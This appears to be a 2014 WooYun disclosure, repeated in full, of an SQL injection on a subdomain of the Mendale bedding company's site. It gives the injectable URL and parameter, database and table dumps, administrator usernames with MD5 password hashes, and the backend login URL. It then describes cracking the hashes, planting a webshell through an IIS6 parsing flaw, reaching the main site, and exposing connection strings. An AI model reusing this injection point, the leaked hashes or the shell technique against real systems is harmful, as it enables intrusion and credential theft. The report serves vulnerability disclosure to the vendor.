当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056996

漏洞标题:梦洁家纺sql注射影响主站

相关厂商:mendale.com

漏洞作者: 卡卡

提交时间:2014-04-14 10:53

修复时间:2014-05-29 10:54

公开时间:2014-05-29 10:54

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-14: 细节已通知厂商并且等待厂商处理中
2014-04-15: 厂商已经确认,细节仅向厂商公开
2014-04-25: 细节向核心白帽子及相关领域专家公开
2014-05-05: 细节向普通白帽子公开
2014-05-15: 细节向实习白帽子公开
2014-05-29: 细节向公众公开

简要描述:

梦洁家纺某站sql注射,有木有礼物?

详细说明:

问题出现在这个站点

http://love.mendale.com.cn/


一个盲注,注的很慢~~~
注入点:

http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1


注入信息:

.png


库:

available databases [6]:
[*] [mengjie\x03]
[*] master
[*] Mendale
[*] model
[*] msdb
[*] tempdb


当前库:Mendale
表:

Database: Mendale
[37 tables]
+------------------+
| Culture          |
| Employment       |
| FamilySituation  |
| Glimpses         |
| GlimpsesType     |
| IPAddress        |
| IPBlacklist      |
| IPVisit          |
| ImageCarousel    |
| InvDown          |
| InvDownType      |
| InvRelations     |
| JobAppForm       |
| JobType          |
| ManageUser       |
| Menu             |
| Mess             |
| MessType         |
| NewType          |
| News             |
| OperationLog     |
| OperationType    |
| RecAnnouncement  |
| RecType          |
| Roles            |
| SpecialReports   |
| Television       |
| TelevisionType   |
| TopicType        |
| UserLoginLog     |
| WorkExperience   |
| Bo?"              |
| Brand♣☻          |
| CulType◄☻        |
| `\?81uSituation  |
| dtpropertiey☻Q!A |
| aB               |
+------------------+


由于是盲注,所以有些没正常显示,但是不影响
管理账号:

Table: ManageUser
[4 entries]
+----------------------------------+------------+
| loginpwd                         | LoginUser  |
+----------------------------------+------------+
| 4A3D04E200DB98302A50615DB2FD59C5 | 1          |
| 534754E15742134EBFC084532A93AE99 | WUWW       |
| 7F59FA288A11AC121FD605E09940E45D | MJHR       |
| 80CBA3D0DBD1F6A80B4DC8C59DFBBD94 | wujuan2005 |
+----------------------------------+------------+


后台地址:

http://love.mendale.com.cn/webmaster/Index.aspx


破解md5,成功登陆后台

.png


利用iis6解析漏洞,成功拿到shell

shell.png


发现主站也在这台机器上面,而且目录权限很宽松,直接跨主站无压力,来个txt装装逼

txt.png


数据库信息一览无遗

<add name="Mendale" connectionString="server=.;user id=mjjt****;password=eman****;database=Mendale;min pool size=4;max pool size=512;packet size=3072" providerName="System.Data.SqlClient"/>
		<add name="Mendale.mdb" providerName="System.Data.OleDb" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|Mendale.mdb;"/>
		<add name="OraConnString" connectionString="Data Source=localhost;user id=BS;password=********;min pool size=4;max pool size=4" providerName="System.Data.OracleClient"></add>


.png


关键部位星号代替。。
asp权限都可以执行命令,目测提权无压力
只是检测,并未任何破坏,shell请自行删除
rank有木有?妹子有木有?礼物有木有?

漏洞证明:

注入点:

http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1


注入信息:

.png


库:

available databases [6]:
[*] [mengjie\x03]
[*] master
[*] Mendale
[*] model
[*] msdb
[*] tempdb


当前库:Mendale
表:

Database: Mendale
[37 tables]
+------------------+
| Culture          |
| Employment       |
| FamilySituation  |
| Glimpses         |
| GlimpsesType     |
| IPAddress        |
| IPBlacklist      |
| IPVisit          |
| ImageCarousel    |
| InvDown          |
| InvDownType      |
| InvRelations     |
| JobAppForm       |
| JobType          |
| ManageUser       |
| Menu             |
| Mess             |
| MessType         |
| NewType          |
| News             |
| OperationLog     |
| OperationType    |
| RecAnnouncement  |
| RecType          |
| Roles            |
| SpecialReports   |
| Television       |
| TelevisionType   |
| TopicType        |
| UserLoginLog     |
| WorkExperience   |
| Bo?"              |
| Brand♣☻          |
| CulType◄☻        |
| `\?81uSituation  |
| dtpropertiey☻Q!A |
| aB               |
+------------------+


由于是盲注,所以有些没正常显示,但是不影响
管理账号:

Table: ManageUser
[4 entries]
+----------------------------------+------------+
| loginpwd                         | LoginUser  |
+----------------------------------+------------+
| 4A3D04E200DB98302A50615DB2FD59C5 | 1          |
| 534754E15742134EBFC084532A93AE99 | WUWW       |
| 7F59FA288A11AC121FD605E09940E45D | MJHR       |
| 80CBA3D0DBD1F6A80B4DC8C59DFBBD94 | wujuan2005 |
+----------------------------------+------------+


后台地址:

http://love.mendale.com.cn/webmaster/Index.aspx


破解md5,成功登陆后台

.png


利用iis6解析漏洞,成功拿到shell

shell.png


发现主站也在这台机器上面,而且目录权限很宽松,直接跨主站无压力,来个txt装装逼

txt.png


数据库信息一览无遗

<add name="Mendale" connectionString="server=.;user id=mjjt****;password=eman****;database=Mendale;min pool size=4;max pool size=512;packet size=3072" providerName="System.Data.SqlClient"/>
		<add name="Mendale.mdb" providerName="System.Data.OleDb" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|Mendale.mdb;"/>
		<add name="OraConnString" connectionString="Data Source=localhost;user id=BS;password=********;min pool size=4;max pool size=4" providerName="System.Data.OracleClient"></add>


.png


修复方案:

你们懂得啊~~~求妹子,求rank,求礼物~~~

版权声明:转载请注明来源 卡卡@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-04-15 14:39

厂商回复:

感谢提供信息

最新状态:

暂无